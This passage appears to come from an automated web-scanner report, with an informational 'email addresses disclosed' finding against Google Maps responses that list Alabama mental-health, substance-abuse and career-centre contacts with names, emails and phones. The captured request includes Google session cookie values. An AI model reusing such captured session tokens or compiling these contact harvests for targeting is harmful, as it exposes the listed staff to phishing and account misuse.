al Alabama (Quest), Prevention Office\x3c/b\x3e\x3cbr\x3e4110 Hwy 31 S\x3cbr\x3eDecatur, AL 35601\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eMichele Moore\x3cbr\x3e256-353-9116\x3cbr\x3e\x3ca href=\"mailto:mhood@mhcnca.org\" target=\"_blank\"\x3emhood@mhcnca.org\x3c/a\x3e",infoWindow:{title:"Mental Health Center of North Central Alabama (Quest), Prevention Office",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Mental Health Center of North Centra
...[SNIP]...
al Alabama (Quest), Prevention Office\x3c/b\x3e\x3cbr\x3e4110 Hwy 31 S\x3cbr\x3eDecatur, AL 35601\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eMichele Moore\x3cbr\x3e256-353-9116\x3cbr\x3e\x3ca href=\"mailto:mhood@mhcnca.org\" target=\"_blank\"\x3emhood@mhcnca.org\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=34.605442,-87.013500\x26thumb=0",photoType:2},b_s:0,elms:[6,10,1,12,1,9,2,5]},{id:"loc26",fid:"g9e
...[SNIP]...
Northwest Alabama Mental Health Cente\x3c/b\x3er\x3cbr\x3e1100 7th Avenue\x3cbr\x3eJasper, AL 35501\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eSkip Newman\x3cbr\x3e800-489-3971\x3cbr\x3e\x3ca href=\"mailto:skip@nwamhc.com\" target=\"_blank\"\x3eskip@nwamhc.com\x3c/a\x3e",infoWindow:{title:"Northwest Alabama Mental Health Center",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Northwest Alabama Mental Health Center1100 7th AvenueJasper, AL 35501
...[SNIP]...
Northwest Alabama Mental Health Cente\x3c/b\x3er\x3cbr\x3e1100 7th Avenue\x3cbr\x3eJasper, AL 35501\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eSkip Newman\x3cbr\x3e800-489-3971\x3cbr\x3e\x3ca href=\"mailto:skip@nwamhc.com\" target=\"_blank\"\x3eskip@nwamhc.com\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=33.821444,-87.292232\x26thumb=0",photoType:2},b_s:0,elms:[6,10,1,12,1,9,2,5]},{id:"loc28",fid:"gba
...[SNIP]...
eOakmont Center\x3c/b\x3e\x3cbr\x3e2008 21st Street Ensley\x3cbr\x3eBirmingham, AL 35218\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eDr. Ernest Porterfield\x3cbr\x3e205-787-7100\x3cbr\x3e\x3ca href=\"mailto:omt@bellsouth.net\" target=\"_blank\"\x3eomt@bellsouth.net\x3c/a\x3e",infoWindow:{title:"Oakmont Center",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Oakmont Center2008 21st Street EnsleyBirmingham, AL 35218Contact:Dr. Ernest Por",dscr:"\x3cb\
...[SNIP]...
eOakmont Center\x3c/b\x3e\x3cbr\x3e2008 21st Street Ensley\x3cbr\x3eBirmingham, AL 35218\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eDr. Ernest Porterfield\x3cbr\x3e205-787-7100\x3cbr\x3e\x3ca href=\"mailto:omt@bellsouth.net\" target=\"_blank\"\x3eomt@bellsouth.net\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=33.507118,-86.893683\x26thumb=0",photoType:2},b_s:0,elms:[6,10,1,12,1,9,2,5]},{id:"loc29",fid:"g25
...[SNIP]...
ubstance Abuse Services\x3c/b\x3e\x3cbr\x3e635 West College Street\x3cbr\x3eFlorence, AL 35630\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eDr. Bryan Libell\x3cbr\x3e256-764-3431\x3cbr\x3e\x3ca href=\"mailto:mistyreid@rcmh.org\" target=\"_blank\"\x3emistyreid@rcmh.org\x3c/a\x3e",infoWindow:{title:"Riverbend Substance Abuse Services",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Riverbend Substance Abuse Services635 West College StreetFlorence, AL 356
...[SNIP]...
ubstance Abuse Services\x3c/b\x3e\x3cbr\x3e635 West College Street\x3cbr\x3eFlorence, AL 35630\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eDr. Bryan Libell\x3cbr\x3e256-764-3431\x3cbr\x3e\x3ca href=\"mailto:mistyreid@rcmh.org\" target=\"_blank\"\x3emistyreid@rcmh.org\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=34.827890,-87.664551\x26thumb=0",photoType:2},b_s:0,elms:[6,10,1,12,1,9,2,5]},{id:"loc30",fid:"gce
...[SNIP]...
NO, Inc.\x3c/b\x3e\x3cbr\x3e492 South Court Street\x3cbr\x3eSuite 1\x3cbr\x3eMontgomery, AL 36104\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eFrank Winkler\x3cbr\x3e334-265-1821\x3cbr\x3e\x3ca href=\"mailto:sayno@mindspring.com\" target=\"_blank\"\x3esayno@mindspring.com\x3c/a\x3e",infoWindow:{title:"SAYNO, Inc.",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"SAYNO, Inc.492 South Court StreetSuite 1Montgomery, AL 36104Contact:Frank Winkl",dscr:"\x3cb\x3e
...[SNIP]...
NO, Inc.\x3c/b\x3e\x3cbr\x3e492 South Court Street\x3cbr\x3eSuite 1\x3cbr\x3eMontgomery, AL 36104\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eFrank Winkler\x3cbr\x3e334-265-1821\x3cbr\x3e\x3ca href=\"mailto:sayno@mindspring.com\" target=\"_blank\"\x3esayno@mindspring.com\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=32.395269,-86.339717\x26thumb=0",photoType:2},b_s:0,elms:[6,10,1,12,1,9,2,5]},{id:"loc31",fid:"gf3
...[SNIP]...
Health Center, Main Office\x3c/b\x3e\x3cbr\x3e402 Academy Drive\x3cbr\x3eAndalusia, AL 36420\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eCynthia A. Hataway\x3cbr\x3e334-222-2737\x3cbr\x3e\x3ca href=\"mailto:scamhb@alaweb.com\" target=\"_blank\"\x3escamhb@alaweb.com\x3c/a\x3e",infoWindow:{title:"South Central Mental Health Center, Main Office",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"South Central Mental Health Center, Main Office402 Academy Dr
...[SNIP]...
Health Center, Main Office\x3c/b\x3e\x3cbr\x3e402 Academy Drive\x3cbr\x3eAndalusia, AL 36420\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eCynthia A. Hataway\x3cbr\x3e334-222-2737\x3cbr\x3e\x3ca href=\"mailto:scamhb@alaweb.com\" target=\"_blank\"\x3escamhb@alaweb.com\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=31.227919,-86.690708\x26thumb=0",photoType:2},b_s:0,elms:[6,10,1,12,1,9,2,5]},{id:"loc32",fid:"g24
...[SNIP]...
alth Center, Prevention Office\x3c/b\x3e\x3cbr\x3e150 Hospital Drive\x3cbr\x3eAndalusia, AL 36420\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eCindy Jackson\x3cbr\x3e334-335-6294\x3cbr\x3e\x3ca href=\"mailto:scamhb@alaweb.com\" target=\"_blank\"\x3escamhb@alaweb.com\x3c/a\x3e",infoWindow:{title:"South Central Mental Health Center, Prevention Office",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"South Central Mental Health Center, Prevention Office15
...[SNIP]...
alth Center, Prevention Office\x3c/b\x3e\x3cbr\x3e150 Hospital Drive\x3cbr\x3eAndalusia, AL 36420\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eCindy Jackson\x3cbr\x3e334-335-6294\x3cbr\x3e\x3ca href=\"mailto:scamhb@alaweb.com\" target=\"_blank\"\x3escamhb@alaweb.com\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=31.227919,-86.690708\x26thumb=0",photoType:2},b_s:0,elms:[6,10,1,12,1,9,2,5]},{id:"loc33",fid:"g99
...[SNIP]...
Health Center, Main Office\x3c/b\x3e\x3cbr\x3e328 W Claiborne St\x3cbr\x3eMonroeville, AL 36460\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eCandace Harden\x3cbr\x3e251-867-4203\x3cbr\x3e\x3ca href=\"mailto:candace@swamh.com\" target=\"_blank\"\x3ecandace@swamh.com\x3c/a\x3e",infoWindow:{title:"Southwest Alabama Mental Health Center, Main Office",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Southwest Alabama Mental Health Center, Main Office328 W
...[SNIP]...
Health Center, Main Office\x3c/b\x3e\x3cbr\x3e328 W Claiborne St\x3cbr\x3eMonroeville, AL 36460\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eCandace Harden\x3cbr\x3e251-867-4203\x3cbr\x3e\x3ca href=\"mailto:candace@swamh.com\" target=\"_blank\"\x3ecandace@swamh.com\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=31.513386,-87.299458\x26thumb=0",photoType:2},b_s:0,elms:[6,10,1,12,1,9,2,5]},{id:"loc34",fid:"g4e
...[SNIP]...
ealth Center, Prevention Office\x3c/b\x3e\x3cbr\x3e328 W Claiborne St\x3cbr\x3eMonroeville, AL 36460\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eDarlu Nall\x3cbr\x3e251-867-3243\x3cbr\x3e\x3ca href=\"mailto:darlu@swamh.com\" target=\"_blank\"\x3edarlu@swamh.com\x3c/a\x3e",infoWindow:{title:"Southwest Alabama Mental Health Center, Prevention Office",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Southwest Alabama Mental Health Center, Prevention
...[SNIP]...
ealth Center, Prevention Office\x3c/b\x3e\x3cbr\x3e328 W Claiborne St\x3cbr\x3eMonroeville, AL 36460\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eDarlu Nall\x3cbr\x3e251-867-3243\x3cbr\x3e\x3ca href=\"mailto:darlu@swamh.com\" target=\"_blank\"\x3edarlu@swamh.com\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=31.513386,-87.299458\x26thumb=0",photoType:2},b_s:0,elms:[6,10,1,12,1,9,2,5]},{id:"loc35",fid:"gf2
...[SNIP]...
cription:"\x3cb\x3eSpectra Care\x3c/b\x3e\x3cbr\x3e191 South Oates Street\x3cbr\x3eDothan, AL 36301\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eReyner Webb\x3cbr\x3e334-677-1156\x3cbr\x3e\x3ca href=\"mailto:webbr@spcare.com\" target=\"_blank\"\x3ewebbr@spcare.com\x3c/a\x3e",infoWindow:{title:"Spectra Care",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Spectra Care191 South Oates StreetDothan, AL 36301Contact:Reyner Webb334-677-11",dscr:"\x3cb\x3eSpectra Care\x3c/b\x3e\x3cbr\x3e191 South Oates Street\x3cbr\x3eDothan, AL 36301\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eReyner Webb\x3cbr\x3e334-677-1156\x3cbr\x3e\x3ca href=\"mailto:webbr@spcare.com\" target=\"_blank\"\x3ewebbr@spcare.com\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=31.145569,-85.403315\x26thumb=0",photoType:2},b_s:0,elms:[6,10,1,12,1,9,2,5]},{id:"loc36",fid:"ge1
...[SNIP]...
\x3eUAB Substance Abuse Programs\x3c/b\x3e\x3cbr\x3e1318 Alabama St.\x3cbr\x3eTarrant, AL 35217\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eSylinda Randall\x3cbr\x3e205-917-3784\x3cbr\x3e\x3ca href=\"mailto:randalls@tarrant.K12.al.us\" target=\"_blank\"\x3erandalls@tarrant.K12.al.us\x3c/a\x3e",infoWindow:{title:"UAB Substance Abuse Programs",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"UAB Substance Abuse Programs1318 Alabama St.Tarrant, AL 35217Contact:Sylinda Ra
...[SNIP]...
\x3eUAB Substance Abuse Programs\x3c/b\x3e\x3cbr\x3e1318 Alabama St.\x3cbr\x3eTarrant, AL 35217\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eSylinda Randall\x3cbr\x3e205-917-3784\x3cbr\x3e\x3ca href=\"mailto:randalls@tarrant.K12.al.us\" target=\"_blank\"\x3erandalls@tarrant.K12.al.us\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=33.606478,-86.761430\x26thumb=0",photoType:2},b_s:0,elms:[6,10,1,12,1,9,2,5]},{id:"loc37",fid:"g04
...[SNIP]...
tal Health Center\x3c/b\x3e\x3cbr\x3e1215 South Walnut Avenue\x3cbr\x3eDemopolis, AL 36732\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eKelley Parris-Barnes\x3cbr\x3e334-289-2410\x3cbr\x3e\x3ca href=\"mailto:kpbarnes@wamhc.org\" target=\"_blank\"\x3ekpbarnes@wamhc.org\x3c/a\x3e",infoWindow:{title:"West Alabama Mental Health Center",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"West Alabama Mental Health Center1215 South Walnut AvenueDemopolis, AL 367
...[SNIP]...
tal Health Center\x3c/b\x3e\x3cbr\x3e1215 South Walnut Avenue\x3cbr\x3eDemopolis, AL 36732\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eKelley Parris-Barnes\x3cbr\x3e334-289-2410\x3cbr\x3e\x3ca href=\"mailto:kpbarnes@wamhc.org\" target=\"_blank\"\x3ekpbarnes@wamhc.org\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=32.415187,-87.912557\x26thumb=0",photoType:2},b_s:0,elms:[6,10,1,12,1,9,2,5]},{id:"loc38",fid:"g3b
...[SNIP]...
l Information Clearinghouse\x3c/b\x3e\x3cbr\x3e3000 Television Avenue\x3cbr\x3eMobile, AL 36606\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eBarbara Johnson\x3cbr\x3e251-478-7855\x3cbr\x3e\x3ca href=\"mailto:bcjohn@drugeducation.org\" target=\"_blank\"\x3ebcjohn@drugeducation.org\x3c/a\x3e",infoWindow:{title:"South Regional Information Clearinghouse",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"South Regional Information Clearinghouse3000 Television AvenueMobile
...[SNIP]...
l Information Clearinghouse\x3c/b\x3e\x3cbr\x3e3000 Television Avenue\x3cbr\x3eMobile, AL 36606\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eBarbara Johnson\x3cbr\x3e251-478-7855\x3cbr\x3e\x3ca href=\"mailto:bcjohn@drugeducation.org\" target=\"_blank\"\x3ebcjohn@drugeducation.org\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=30.670087,-88.105750\x26thumb=0",photoType:2},b_s:0,elms:[6,10,1,12,1,9,2,5]},{id:"loc39",fid:"g54
...[SNIP]...

22.66. http://maps.google.com/maps/gx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.google.com
Path:   /maps/gx

Issue detail

The following email addresses were disclosed in the response:

Request

GET /maps/gx?q=http%3A%2F%2Fwww.alabama.gov%2Frss%2Fmaps_CAREER_CENTERS.kml&jsv=310c&vps=1&source=maps_api&callback=_xdc_._7gn3tnggy HTTP/1.1
Host: maps.google.com
Proxy-Connection: keep-alive
Referer: http://www.alabama.gov/portal/index.jsp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=DEntMOM-vLiKsZ_1SG3HUd0B0oGbRKXtRpi1pq3lEVMkOSBMrvdVv72rCBr0341W89kHA-PBZDI3vmV4fFluvryIdICZc8i1bWqGwoBC29F_oZvehlhP4A1MlN_8jpYE

Response

HTTP/1.1 200 OK
Last-Modified: Sat, 30 Apr 2011 00:36:38 GMT
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 30 Apr 2011 00:36:38 GMT
Server: mfe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 79670

_xdc_._7gn3tnggy && _xdc_._7gn3tnggy({"name":"http://www.alabama.gov/rss/maps_CAREER_CENTERS.kml","Status":{"code":200,"request":"geoxml"},viewport: {center: {lat: 32.656876,lng: -86.656030},span: {la
...[SNIP]...
ca href=\"https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=85240000\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eGreg Minor\x3cbr\x3e\x3ca href=\"mailto:Alabaster.CareerCenter@dir.alabama.gov\" target=\"_blank\"\x3eAlabaster.CareerCenter@dir.alabama.gov\x3c/a\x3e\x3cbr\x3ePhone: 205-663-2542\x3cbr\x3eFax: 205-664-9229",infoWindow:{title:"Alabaster Career Center",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Alabaster Career Center109 Pl
...[SNIP]...
ca href=\"https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=85240000\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eGreg Minor\x3cbr\x3e\x3ca href=\"mailto:Alabaster.CareerCenter@dir.alabama.gov\" target=\"_blank\"\x3eAlabaster.CareerCenter@dir.alabama.gov\x3c/a\x3e\x3cbr\x3ePhone: 205-663-2542\x3cbr\x3eFax: 205-664-9229",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=33.218410,-86.827364\x26thumb=0",photoType
...[SNIP]...
href=\"https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=85030000\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eTommy Austin\x3cbr\x3e\x3ca href=\"mailto:Albertville.CareerCenter@dir.alabama.gov\" target=\"_blank\"\x3eAlbertville.CareerCenter@dir.alabama.gov\x3c/a\x3e\x3cbr\x3ePhone: 256-878-3031\x3cbr\x3eFax: 256-878-7728",infoWindow:{title:"Albertville Career Center",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Albertville Career Center59
...[SNIP]...
href=\"https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=85030000\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eTommy Austin\x3cbr\x3e\x3ca href=\"mailto:Albertville.CareerCenter@dir.alabama.gov\" target=\"_blank\"\x3eAlbertville.CareerCenter@dir.alabama.gov\x3c/a\x3e\x3cbr\x3ePhone: 256-878-3031\x3cbr\x3eFax: 256-878-7728",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=34.265263,-86.191798\x26thumb=0",photoType
...[SNIP]...
ref=\"https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=85050000\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eReseda Shelton\x3cbr\x3e\x3ca href=\"mailto:AlexanderCity.CareerCenter@dir.alabama.gov\" target=\"_blank\"\x3eAlexanderCity.CareerCenter@dir.alabama.gov\x3c/a\x3e\x3cbr\x3ePhone: 256-215-4494\x3cbr\x3eFax: 256-215-4516",infoWindow:{title:"Alex City Career Center - Central Ala Comm Coll",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Alex
...[SNIP]...
ref=\"https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=85050000\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eReseda Shelton\x3cbr\x3e\x3ca href=\"mailto:AlexanderCity.CareerCenter@dir.alabama.gov\" target=\"_blank\"\x3eAlexanderCity.CareerCenter@dir.alabama.gov\x3c/a\x3e\x3cbr\x3ePhone: 256-215-4494\x3cbr\x3eFax: 256-215-4516",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=32.926989,-85.945981\x26thumb=0",photoType
...[SNIP]...
/joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=75380000\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eWednesday \x26amp; Thursday\x3cbr\x3e\x3ca href=\"mailto:Enterprise.CareerCenter@dir.alabama.gov\" target=\"_blank\"\x3eEnterprise.CareerCenter@dir.alabama.gov\x3c/a\x3e\x3cbr\x3ePhone: 334-881-2304\x3cbr\x3eFax: 334-881-2201",infoWindow:{title:"Andalusia Career Center - L B Wallace Comm Coll",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Andal
...[SNIP]...
/joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=75380000\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eWednesday \x26amp; Thursday\x3cbr\x3e\x3ca href=\"mailto:Enterprise.CareerCenter@dir.alabama.gov\" target=\"_blank\"\x3eEnterprise.CareerCenter@dir.alabama.gov\x3c/a\x3e\x3cbr\x3ePhone: 334-881-2304\x3cbr\x3eFax: 334-881-2201",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=31.322902,-86.452155\x26thumb=0",photoType
...[SNIP]...
href=\"https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=85100000\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eRuby Beezley\x3cbr\x3e\x3ca href=\"mailto:Anniston.CareerCenter@dir.alabama.gov\" target=\"_blank\"\x3eAnniston.CareerCenter@dir.alabama.gov\x3c/a\x3e\x3cbr\x3ePhone: 256-832-0147\x3cbr\x3eFax: 256-832-1183",infoWindow:{title:"Anniston Career Center - Gadsden State Comm Coll",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Anni
...[SNIP]...
href=\"https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=85100000\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eRuby Beezley\x3cbr\x3e\x3ca href=\"mailto:Anniston.CareerCenter@dir.alabama.gov\" target=\"_blank\"\x3eAnniston.CareerCenter@dir.alabama.gov\x3c/a\x3e\x3cbr\x3ePhone: 256-832-0147\x3cbr\x3eFax: 256-832-1183",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=33.621811,-85.803414\x26thumb=0",photoType
...[SNIP]...
ref=\"https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=85120000\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eShirley Haynes\x3cbr\x3e\x3ca href=\"mailto:Shirley.Haynes@adeca.alabama.gov\" target=\"_blank\"\x3eShirley.Haynes@adeca.alabama.gov\x3c/a\x3e\x3cbr\x3ePhone: 251-937-4161\x3cbr\x3eFax: 251-937-2859",infoWindow:{title:"Bay Minette Career Center",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Bay Minette Career Center20
...[SNIP]...
ref=\"https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=85120000\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eShirley Haynes\x3cbr\x3e\x3ca href=\"mailto:Shirley.Haynes@adeca.alabama.gov\" target=\"_blank\"\x3eShirley.Haynes@adeca.alabama.gov\x3c/a\x3e\x3cbr\x3ePhone: 251-937-4161\x3cbr\x3eFax: 251-937-2859",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=30.860856,-87.776503\x26thumb=0",photoType
...[SNIP]...
ref=\"https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=90000077\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eLorenza Thomas\x3cbr\x3e\x3ca href=\"mailto:lthomas@lawsonstate.edu\" target=\"_blank\"\x3elthomas@lawsonstate.edu\x3c/a\x3e\x3cbr\x3ePhone: 205-929-3501\x3cbr\x3eFax: 205-929-3603",infoWindow:{title:"Lawson State Community College Bessemer Campus",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Lawson
...[SNIP]...
ref=\"https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=90000077\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eLorenza Thomas\x3cbr\x3e\x3ca href=\"mailto:lthomas@lawsonstate.edu\" target=\"_blank\"\x3elthomas@lawsonstate.edu\x3c/a\x3e\x3cbr\x3ePhone: 205-929-3501\x3cbr\x3eFax: 205-929-3603",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=33.370012,-86.994845\x26thumb=0",photoType
...[SNIP]...
ref=\"https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=90000079\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eLorenza Thomas\x3cbr\x3e\x3ca href=\"mailto:lthomas@lawsonstate.edu\" target=\"_blank\"\x3elthomas@lawsonstate.edu\x3c/a\x3e\x3cbr\x3ePhone: 205-925-6467\x3cbr\x3eFax: 205-925-3716",infoWindow:{title:"Lawson State Community College",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Lawson State Community
...[SNIP]...
ref=\"https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=90000079\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eLorenza Thomas\x3cbr\x3e\x3ca href=\"mailto:lthomas@lawsonstate.edu\" target=\"_blank\"\x3elthomas@lawsonstate.edu\x3c/a\x3e\x3cbr\x3ePhone: 205-925-6467\x3cbr\x3eFax: 205-925-3716",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=33.449363,-86.888685\x26thumb=0",photoType
...[SNIP]...
href=\"https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=85220000\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eYvette Fields\x3cbr\x3e\x3ca href=\"mailto:Birmingham.CareerCenter@dir.alabama.gov\" target=\"_blank\"\x3eBirmingham.CareerCenter@dir.alabama.gov\x3c/a\x3e\x3cbr\x3ePhone: 205-254-1300\x3cbr\x3eFax: 205-254-1387",infoWindow:{title:"Birmingham Career Center",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Birmingham Career Center3440
...[SNIP]...
href=\"https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=85220000\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eYvette Fields\x3cbr\x3e\x3ca href=\"mailto:Birmingham.CareerCenter@dir.alabama.gov\" target=\"_blank\"\x3eBirmingham.CareerCenter@dir.alabama.gov\x3c/a\x3e\x3cbr\x3ePhone: 205-254-1300\x3cbr\x3eFax: 205-254-1387",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=33.519423,-86.782905\x26thumb=0",photoType
...[SNIP]...
